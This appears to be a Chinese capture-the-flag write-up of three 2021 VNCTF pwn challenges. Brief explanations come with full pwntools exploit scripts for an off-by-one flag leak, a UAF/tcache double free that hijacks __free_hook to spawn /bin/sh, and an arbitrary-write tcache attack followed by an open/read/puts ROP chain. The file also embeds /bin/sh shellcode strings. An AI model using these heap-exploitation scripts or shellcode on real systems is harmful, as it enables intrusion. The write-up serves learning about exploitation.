
[复现]2021VNCTF-pwn


hh这个vmpwn就不做了叭,好麻烦

White_Give_Flag

这里是申请了一个随机大小的堆块

image

先是把flag读进heap里面,然后free掉,进入程序看发现

进入菜单之前,flag在top heap中,似乎只要申请就会出来

image

不过,随机的

image

在这里会有一个数组溢出,但是只能溢出1

image

溢出的地方正巧是heap指针的最后一个

那么就是利用这个puts输出,由于是随机的,所以我们只能爆破,就假定是0x310的堆块,最终还是会申请出来的。

from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'  # trace every byte on the tube
# NOTE(review): this handle is never used -- the loop further down spawns a
# fresh child on every iteration and rebinds `p`, so this first process is
# left running and unclosed until the script exits.
p = process('./1')
#elf = ELF('./1')

# Thin wrappers over the module-level tube `p`.  Data and delimiters are
# coerced with str() exactly as the original lambda helpers did.
def s(data):
	"""Send `data` to the tube."""
	return p.send(str(data))

def sa(delim, data):
	"""Wait for `delim`, then send `data`."""
	return p.sendafter(str(delim), str(data))

def sl(data):
	"""Send `data` followed by a newline."""
	return p.sendline(str(data))

def sla(delim, data):
	"""Wait for `delim`, then send `data` followed by a newline."""
	return p.sendlineafter(str(delim), str(data))

def r(num):
	"""Receive up to `num` bytes."""
	return p.recv(num)

def ru(delims, drop=True):
	"""Receive through `delims`; the delimiter itself is dropped by default."""
	return p.recvuntil(delims, drop)

def itr():
	"""Hand the tube over to the terminal."""
	return p.interactive()

def uu32(data):
	"""Unpack a 32-bit value from up to 4 bytes, zero-padded on the right."""
	return u32(data.ljust(4, b'\x00'))

def uu64(data):
	"""Unpack a 64-bit value from up to 8 bytes, zero-padded on the right."""
	return u64(data.ljust(8, b'\x00'))

def leak(name, addr):
	"""Log `addr` in hex under the label `name`."""
	return log.success('{} = {:#x}'.format(name, addr))

def debug():
	"""Attach gdb to the running child and block until the user continues."""
	gdb.attach(p)
	pause()

def menu(choice):
	"""Answer the 'choice:' prompt with `choice` as one line."""
	p.sendlineafter('choice:', str(choice))

def add(size):
	"""Allocate a chunk of `size` bytes.

	The add option is selected with an empty choice line (what this
	challenge's menu expects -- verify against the binary), then `size`
	is sent at the 'size:' prompt.
	"""
	menu('')
	p.sendlineafter('size:\n', str(size))

def edit(index, data):
	"""Write `data` into chunk `index` (menu choice '111').

	`data` is sent raw -- no newline and no str() coercion -- so bytes
	payloads go through untouched.
	"""
	menu('111')
	p.sendlineafter('index:\n', str(index))
	p.sendafter('Content:\n', data)

def delete(index):
	"""Free chunk `index` (menu choice '11')."""
	menu('11')
	p.sendlineafter('index:\n', str(index))

def show(index):
	"""Select the show option (menu choice '1').

	NOTE(review): `index` is accepted but never sent, so the caller's
	choice of chunk is ignored; nothing in this script calls show().
	"""
	sla('choice:', '1')

#debug()


# Brute-force loop: the chunk holding the flag has a random size, so keep
# spawning the target, assume 0x310, and stop once a line containing a brace
# comes back.  Rebinding the module-level `p` is what makes the helpers above
# talk to the new child.
while True:
    p = process('./1')
    for _ in range(3):
        add(0x10)
    add(0x310)
    # off-by-one on the last heap pointer slot (see write-up)
    edit(3, 'a' * 0x10)
    p.recvuntil('choice:')
    p.shutdown_raw('send')
    flag = p.recvline()
    print(flag)
    if any(marker in flag for marker in (b'{', b'}')):
        # success path exits the whole script here; the interactive() call
        # below is therefore never reached
        exit(0)
    p.close()

p.interactive()

image

ff

存在一个uaf,free没有清空指针,仅有一次show

利用这一次show泄露指针异或的key

然后利用tcachebin的double free将tcache struct free掉,利用fd上残余的libc地址爆破stdout地址泄露libc

然后继续利用double free打__free_hook来提权

#encoding = utf-8
import os
import sys
import time
from pwn import *
from ctypes import *
#from LibcSearcher import * 

context.os = 'linux'
context.log_level = "debug"  # trace every byte sent and received

# Helper set around the global tube `p`; identical in effect to the usual
# lambda one-liners, with str() coercion on everything but raw receives.
def s(data):
	"""Send `data`."""
	return p.send(str(data))

def sa(delim, data):
	"""Send `data` once `delim` has been received."""
	return p.sendafter(str(delim), str(data))

def sl(data):
	"""Send `data` plus a newline."""
	return p.sendline(str(data))

def sla(delim, data):
	"""Send `data` plus a newline once `delim` has been received."""
	return p.sendlineafter(str(delim), str(data))

def r(num):
	"""Receive up to `num` bytes."""
	return p.recv(num)

def ru(delims, drop=True):
	"""Receive through `delims`, dropping the delimiter unless drop=False."""
	return p.recvuntil(delims, drop)

def itr():
	"""Go interactive."""
	return p.interactive()

def uu32(data):
	"""u32 over `data` right-padded with NULs to 4 bytes."""
	return u32(data.ljust(4, b'\x00'))

def uu64(data):
	"""u64 over `data` right-padded with NULs to 8 bytes."""
	return u64(data.ljust(8, b'\x00'))

def leak(name, addr):
	"""Log `name = 0x...`."""
	return log.success('{} = {:#x}'.format(name, addr))


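armmips = 0   # 0: run the target natively; anything else: under qemu-user (see launch block below)
x64_32 = 1    # 1: amd64, 0: i386

# Supported invocations:
#   script.py <binary> <libc> <ld>   -> local process (ld or libc may be '' to skip them)
#   script.py <ip> <port>            -> remote target
# Any other argument count used to fail much later with a NameError on
# `ip`/`binary`; stop here with a usage line instead.
if len(sys.argv) == 4:
	binary = sys.argv[1]
	libcelf = sys.argv[2]
	ldfile = sys.argv[3]
elif len(sys.argv) == 3:
	ip = sys.argv[1]
	port = sys.argv[2]
else:
	sys.exit('usage: {0} <binary> <libc> <ld> | {0} <ip> <port>'.format(sys.argv[0]))

context.arch = 'amd64' if x64_32 else 'i386'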

# Launch the target.  Three positional arguments mean a local process, two
# mean a remote host; `armmips` switches between native and qemu-user
# execution (qemu started with its gdb stub on port 1212).
if armmips == 0:
	if len(sys.argv) != 4:
		p = remote(ip, port)
	elif ldfile:
		# explicit loader plus LD_PRELOADed libc
		p = process([ldfile, binary], env={"LD_PRELOAD": libcelf})
		libc = ELF(libcelf)
		elf = ELF(binary)
	elif libcelf:
		# LD_PRELOADed libc only
		p = process([binary], env={"LD_PRELOAD": libcelf})
		libc = ELF(libcelf)
		elf = ELF(binary)
	else:
		p = process(binary)
else:
	if len(sys.argv) != 4:
		p = remote(ip, port)
	elif x64_32:
		# NOTE(review): x64_32 doubles as the arm/aarch64 selector here,
		# which does not line up with its amd64/i386 meaning above -- verify.
		p = process(["qemu-arm", "-g", "1212", "-L", "/usr/arm-linux-gnueabi", binary])
	else:
		p = process(["qemu-aarch64", "-g", "1212", "-L", "/usr/aarch64-linux-gnu/", binary])

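# ctypes handle on the local libc; nothing in this script uses it.  Only load
# it when a libc path was given on the command line -- in remote mode (two
# arguments) `libcelf` is never bound and this line raised NameError before
# anything was sent.  (pwn() also needs `libc`, which the launch block above
# binds only in local mode.)
libcc = cdll.LoadLibrary(libcelf) if len(sys.argv) == 4 else None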

# Canned stubs carried over from a generic template; nothing in this script
# references them.  Note they are str literals, not bytes.
sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"

def debug():
	"""Attach gdb to the child and block until the user continues."""
	gdb.attach(p)
	pause()

def add(size,con):
	"""Menu option 1: allocate `size` bytes holding `con`.

	NOTE(review): dead code -- the second `add` definition right below
	replaces this one at import time.  The two differ only in the prompt
	strings they wait for ('Size:'/'Content:' here versus ':' there).
	"""
	sla('>>','1')
	sla('Size:',size)
	p.sendafter('Content:',con)
  
def add(size, con):
	"""Menu option 1: request a chunk of `size` bytes and fill it with `con`.

	`con` is sent raw (no newline, no str()), so bytes payloads pass through.
	"""
	sla('>>', '1')
	sla(':', size)
	p.sendafter(':', con)
  
def delete():
	"""Menu option 2: free the current chunk (the program takes no index)."""
	sla('>>', '2')
  
def show():
	"""Menu option 3: print the current chunk (usable once, per the write-up)."""
	sla('>>', '3')
  
def edit(con):
	"""Menu option 5: overwrite the current chunk's contents with raw `con`."""
	sla('>>', '5')
	p.sendafter(':', con)

def pwn():
	"""Exploit flow for `ff`, following the write-up above.

	Stages: leak the pointer-xor key with the single show(), free the tcache
	struct through the double free, leak libc via stdout, then point
	__free_hook at system.  Every constant below (0x1E1744, the 0x4e/0x07
	layout, the '\\xc0\\x56' guess) is tied to the challenge's libc build --
	TODO confirm against the target libc before reuse.
	"""
	add(0x60,'1')
	delete()
	show()
	# the program prints 5 bytes of the freed chunk; uu64 pads them to 8
	key = uu64(r(5))
	leak('key',key)
	# the write-up derives the heap base from the key by shifting it up 12 bits
	heapbase = key*0x1000
	leak('heapbase',heapbase)

	# free() does not clear the pointer (UAF), so the same chunk can be freed again
	edit(b'\x00'*0x10)
	delete()
	# next pointer, xored with the leaked key, aimed at the tcache struct
	edit(2*p64(key^(heapbase+0x10)))
	add(0x60,'aaa')
	add(0x60,'\x00'*0x4e + '\x07')
	delete()
	add(0x48,'\x00'*6+'\x01'+'\x00'*0x5+'\x01'+'\x00'*8)
	add(0x38,"\x00"*0x10)
	# partial overwrite with a guessed low word of stdout; the disabled retry
	# loop at the bottom of the file was used to re-run on a wrong guess
	add(0x10,'\x00'*8+'\xc0\x56')
	add(0x40,p64(0xfbad1800) + b'\x00'*0x18 + b'\x00')
	# read until a 0x7f byte, rebuild the 6-byte pointer, subtract the libc offset
	libcbase = uu64((ru('\x7f')[-5:]+b'\x7f')) - 0x1E1744
	leak('libcbase',libcbase)

	# `libc` is only bound in local mode by the launch block above
	free_hook = libcbase + libc.sym['__free_hook']
	system = libcbase + libc.sym['system']
	add(0x30,p64(free_hook))
	add(0x70,p64(system))
	add(0x30,'/bin/sh\x00')
	delete()
	#
	#debug()
	itr()

if __name__ == '__main__':
	# the tube `p` is already opened at import time above, so running this
	# file as a script is the only supported way in
	pwn()


# Retry loop kept as a bare string literal (i.e. disabled).  NOTE(review): it
# refers to `local`, which is never defined in this script; it would need the
# argv-based local/remote decision from the launch block before it could run.
'''
i = 0
while 1:
	i += 1
	log.warn(str(i))
	try:  
		pwn()
	except Exception:
		p.close()
		if(local == 1):
			p = process(binary)
		else:
			p = remote(ip,port)
		continue
'''

image

LittleRedFlower

程序给出了一次任意地址写,然后还给了一次申请堆块的机会,利用之后free掉。

利用任意地址写将TCACHE_MAX_BINS控制成无限大,这样的话开头的tcache管理堆块就会显得异常的大,写入到下面的地址就会被利用为相应大小的tcachebin的第一个堆块

我们只需要申请到free_hook上面劫持为svcudp_reply+26,进行栈迁移然后orw即可

from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'  # trace every byte on the tube
p = process('./pwn')
# hard-coded system libc; every raw libc-relative offset below (gadgets,
# tcache_bins, ogg) is tied to this exact build
libc = ELF('/lib/x86_64-linux-gnu/libc-2.31.so')
elf = ELF('./pwn')

# Tube helpers bound to the global `p`; str() is applied to sent data and
# delimiters, receives return raw bytes.
def s(data):
	"""Send `data`."""
	return p.send(str(data))

def sa(delim, data):
	"""Send `data` after `delim` arrives."""
	return p.sendafter(str(delim), str(data))

def sl(data):
	"""Send `data` and a newline."""
	return p.sendline(str(data))

def sla(delim, data):
	"""Send `data` and a newline after `delim` arrives."""
	return p.sendlineafter(str(delim), str(data))

def r(num):
	"""Receive up to `num` bytes."""
	return p.recv(num)

def ru(delims, drop=True):
	"""Receive through `delims`; drop the delimiter unless told otherwise."""
	return p.recvuntil(delims, drop)

def itr():
	"""Switch to interactive mode."""
	return p.interactive()

def uu32(data):
	"""u32 of `data` NUL-padded to 4 bytes."""
	return u32(data.ljust(4, b'\x00'))

def uu64(data):
	"""u64 of `data` NUL-padded to 8 bytes."""
	return u64(data.ljust(8, b'\x00'))

def leak(name, addr):
	"""Log `name = 0x...`."""
	return log.success('{} = {:#x}'.format(name, addr))

def debug():
	"""Attach gdb to the child and block until the user continues."""
	gdb.attach(p)
	pause()

# The program prints an "0x..." address up front; the script treats it as
# _IO_2_1_stdout_ and reads 12 hex digits (48-bit pointer).
ru('0x')
libcbase = int(r(12),16) - libc.sym["_IO_2_1_stdout_"]
leak('libcbase',libcbase)
# Raw gadget offsets into the libc-2.31 build loaded above -- re-derive if
# the libc differs.
p_rdi = libcbase + 0x0000000000023b6a
p_rdx = libcbase + 0x0000000000142c92
p_rsi = libcbase + 0x000000000002601f
free_hook = libcbase + libc.sym['__free_hook']
puts = libcbase + libc.sym['puts']
read = libcbase + libc.sym['read']
opent = libcbase + libc.sym['open']   # `open` kept under another name to avoid shadowing the builtin
# offset the write-up uses for the tcache bin-count field (TCACHE_MAX_BINS)
tcache_bins = libcbase + 0x1EC2D0
# raw libc offset consumed by the payload below; its meaning is not stated in
# the write-up (the name suggests a one_gadget) -- verify
ogg = libcbase + 0x154DEA

# Step 1: the single arbitrary byte write, aimed at tcache_bins+7 with 0xff
# (write-up: make TCACHE_MAX_BINS effectively unbounded).
p.sendafter('You can write a byte anywhere\n',p64(tcache_bins+0x7))
# '\xff' is a str literal; pwntools coerces it, but b'\xff' would be explicit
p.sendafter('And what?\n','\xff')
# Step 2: the one allocation -- offset, content and size chosen so that, per
# the write-up, the chunk lands at free_hook-0xa0 on the 0x1800 request.
sla('Offset:',0x9e8)
p.sendafter('Content:',p64(free_hook-0xa0))
sla("size:",0x1800)

# Step 3: ROP chain staged around __free_hook (pivot via svcudp_reply+26 per
# the write-up) that does open("./flag") / read(3, buf, 0x30) / puts(buf),
# with buf = free_hook-0x100.  All raw offsets are tied to the libc loaded above.
pl = p64(libcbase+0x00000000000578c8) + p64(libcbase+0x0000000000023b67)+ p64(0) + p64(free_hook-0xc8)
pl += p64(p_rdi) + p64(free_hook -0xa0 + 0x38) + p64(libcbase + 0x00000000000ef194) + b'./flag\x00\x00' + p64(0) + p64(free_hook - 0xa0)
pl += p64(p_rsi) + p64(0) + p64(p_rdx) + p64(0) + p64(opent)
pl += p64(p_rdi) + p64(3) + p64(p_rsi) + p64(free_hook-0x100) + p64(libcbase + 0x0000000002f709) + p64(ogg) + p64(p_rdx) + p64(0x30) + p64(read)
pl += p64(p_rdi) + p64(free_hook-0x100) + p64(puts)
#debug()
p.sendafter('>>',pl)

p.interactive()

image

From: https://www.cnblogs.com/bpcat/p/16891067.html
